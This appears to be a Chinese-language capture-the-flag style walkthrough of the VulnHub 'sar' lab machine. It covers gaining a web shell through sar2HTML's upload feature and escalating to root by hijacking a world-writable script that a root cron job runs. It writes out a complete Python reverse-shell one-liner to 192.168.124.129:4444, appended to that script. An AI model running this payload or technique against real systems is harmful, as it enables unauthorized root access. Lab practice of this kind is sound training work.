“纸上得来终觉浅,绝知此事要躬行”
项目地址
https://download.vulnhub.com/sar/sar.zip
复现过程

主机发现

端口探测

目录扫描

- 访问robots.txt文件

- 访问sar2HTML

- 点击New发现上传点,搜索sar2HTML发现有默认上传路径,使用中国蚁剑连接

提权
- 拿到shell后首先尝试了suid提权,内核提权,但是没有成功!到家目录里面也没有发现特殊文件,然后到网站的根目录下寻找特殊文件。

- 发现了两个特殊文件 :
finally.sh这个文件属于root,write.sh这个文件具有777权限。查看一下这两个文件里面的内容。

- 发现finally.sh里的内容就是执行write.sh文件,write.sh文件的作用就是创建一个文件/tmp/gateway。由此想到了计划任务提权,查看一下 定时任务的配置文件/etc/crontab

- 发现定时计划中有finally.sh,系统会每五分钟就以root权限执行finally.sh。现在将反弹shell的代码写入write.sh中。
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.124.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> write.sh
提权成功

